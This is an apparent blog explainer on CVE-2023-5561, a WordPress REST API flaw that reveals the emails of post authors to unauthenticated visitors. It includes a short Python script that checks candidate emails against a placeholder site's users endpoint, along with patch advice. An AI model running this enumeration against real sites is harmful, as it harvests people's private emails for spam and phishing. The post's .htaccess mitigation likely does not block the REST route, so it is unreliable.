WordPress powers a huge part of the internet—but even the biggest platforms slip up sometimes. One major example is CVE-2023-5561, a vulnerability discovered in late 2023. This bug lets basically anyone (even people who haven’t logged in) figure out the email addresses of users who’ve published posts on your site—all through a clever, Oracle-style attack against the REST API.

In this article, I’ll break down how this issue works, show some proof-of-concept (PoC) code, and share key references so you can read more if you want.

What is CVE-2023-5561?

WordPress introduced a powerful REST API to expose and modify site data using HTTP requests. It’s the same API that powers the Block Editor and lots of modern site features. Normally, private user fields—like emails—shouldn’t be visible to strangers.

But in affected WordPress versions, you can search for users by arbitrary fields (including email addresses), even if you’re not an authenticated user.

So, if you want to know if someone’s email (say, _bob@example.com_) has a public post on a site, you can ask the API: Does a user with this email exist? The API’s response lets you check emails one by one until you have a list.

This kind of trick is called an “Oracle” attack—not because it’s got anything to do with the Oracle corporation, but because you get “yes or no” answers while probing for data you shouldn’t see.

Send a GET request to the REST API’s users endpoint, searching by email.

2. Look at the response—if it includes user data, that email belongs to a user who’s published at least one post.
3. Repeat with a list of possible emails (e.g., common addresses, or emails from a previous data breach) to fish for matches.

The API endpoint at play is /wp-json/wp/v2/users?search=SEARCH_TERM. The bug is that unauthenticated (not logged in) users can filter users by email due to insufficient restrictions.

Here’s a basic Python script that demonstrates this

import requests

WORDPRESS_API = 'https://targetwebsite.com/wp-json/wp/v2/users';

def check_email(email):
    params = {'search': email}
    response = requests.get(WORDPRESS_API, params=params)
    if response.status_code == 200 and response.json():
        print(f"User found for email: {email}")
    else:
        print(f"No user for {email}")

# Try it with a list of emails
emails = [
    "admin@example.com",
    "bob@example.com",
    "jane@example.org"
]

for email in emails:
    check_email(email)

Warning: This is for educational and defensive research purposes only. Do not scan any system you don’t have permission to test.

What’s the Risk?

- Privacy: Your authors’ emails can be harvested and added to spam lists or used in phishing attempts.
- Enumeration: Attackers can position themselves for future attacks (like targeted brute force, social engineering, or password reset attempts).
- No login required: Anyone can do this—no login, no special tools. Just a web browser or a simple script is enough.

Official References

- WordPress Security Release Post
- CVE Record on NVD
- Wordfence Blog: Under the Hood of CVE-2023-5561

Did You Patch?

If you’re running WordPress, update to at least 6.3.2 ASAP. You can do this from the dashboard—just check under “Updates.” Most reputable managed hosts will do this for you.

If you absolutely cannot update right now (not recommended!), strongly consider blocking access to
/wp-json/wp/v2/users for unauthenticated users. For example, if you have an Apache server, you could use .htaccess:

<FilesMatch "wp-json/wp/v2/users">
    Require all denied
</FilesMatch>

Or use a security plugin to limit REST API access.

Conclusion

CVE-2023-5561 might seem simple, but it’s a great example of the risks that come with APIs. When building or hosting platforms, it’s crucial to guard private data—even if it’s just a little piece like an email address. Attackers will use every clue they can get.

If you run a WordPress site, update now, check your privacy settings, and stay up to date with the latest security news.

Stay safe, and keep your WordPress patched!

Further reading:
- Complete WordPress REST API Reference
- How to Limit API Access in WordPress – WPBeginner

*Exclusively written for your prompt. Please use responsibly.*

Timeline

Published on: 10/16/2023 20:15:18 UTC
Last modified on: 11/20/2023 23:15:06 UTC